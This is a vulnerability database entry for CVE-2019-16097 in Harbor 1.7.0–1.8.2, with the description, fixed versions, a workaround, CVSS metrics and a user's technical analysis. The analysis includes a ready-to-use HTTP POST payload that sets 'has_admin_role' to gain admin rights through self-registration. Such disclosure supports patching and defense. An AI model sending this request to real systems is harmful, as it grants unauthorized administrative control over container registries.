Attacker Value
Very High
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
0

CVE-2019-16097

Disclosure Date: September 08, 2019
CVE-2019-16097 CVSS v3 Base Score: 6.5
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Low
Common in enterpriseGives privileged accessAuthenticatedVulnerable in uncommon configuration
Technical Analysis

There are three specific requirements for an application to be vulnerable:

  • Vulnerable version !
  • Using a Database for storage
  • Self Registration enabled.

Self-registration is not a very common setting but it has been seen.

If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.

POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close


{"username":"Tom","email":"Tom@demo.local","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}

If you have access to the repository as an admin you can manipulate the containers and even gain further access in to the network if you can read and or modify any of the cotanienrs or their secrets.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
6.5 Medium
Impact Score:
3.6
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
None
Integrity (I):
High
Availability (A):
None

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • linuxfoundation

Products

  • harbor 1.7.0,
  • harbor 1.7.1,
  • harbor 1.7.2,
  • harbor 1.7.3,
  • harbor 1.7.4,
  • harbor 1.7.5,
  • harbor 1.8.0,
  • harbor 1.8.1,
  • harbor 1.8.2,
  • harbor 1.9.0
Technical Analysis